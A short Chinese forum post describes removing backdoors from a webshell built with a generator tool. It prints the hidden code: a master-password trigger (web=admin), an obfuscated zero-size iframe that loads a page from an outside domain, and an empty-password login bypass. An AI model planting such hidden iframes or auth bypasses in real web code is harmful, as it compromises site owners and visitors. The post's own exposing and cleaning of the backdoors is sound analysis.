菜鸟轻松KILL简单ASP木马后门
某天本菜鸟无聊就找了某期X一同志用易语言编的WEBSHELL生成器,不错,下嘞那个13VIP的WEBSHELL,发现里面有两个后门,一个是万能密码,一个是插入一个网页,不知道做上面的。查找“UserPass”,连续两个向下,代码如下:
if request("web")="admin" then
Session("web2a2dmin") = UserPass
URL()
end if
用Session做身份验证,当Session的值等于web2a2dmin的话,就OK。客户端提交:ASP木马名?web=admin,就可以进去嘞,对付它呢?就直接删除这一段。
我发现这个后门下面那一行有点问题:
hmba1="www.ha"
明显,将“hmba1”变量的值设为“www.ha”,查找“hmba1”,发现嘞代码:
f_addcode.Write "<iframe src=http://"&hmba1&hmba2&"/m.htm width=0 height=0></iframe>"
那个“hmba2”貌似也有问题,代码:
hmba2="ogs.cn",代码合起来就是:
f_addcode.Write "<iframe src=http://www.haogs.cn/m.htm width=0 height=0></iframe>"
直接删除:
hmba1="http://www.ha " ,hmba2="ogs.cn",f_addcode.Write "<iframe src=http://"&hmba1&hmba2&"/m.htm width=0 height=0></iframe>", tfile.Write "<iframe src=http://"&hmba1&hmba2&"/m.htm width=0 height=0></iframe>"(两句一样的)。
这个后门还是很简单的!
补充下:
if session("web2a2dmin")<>UserPass then
if request.form("pass")<>"" then
if request.form("pass")=UserPass then
session("web2a2dmin")=UserPass
汗,才发现的,当客户端提交:ASP木马名?pass="",也能绕过密码验证!
页:
[1]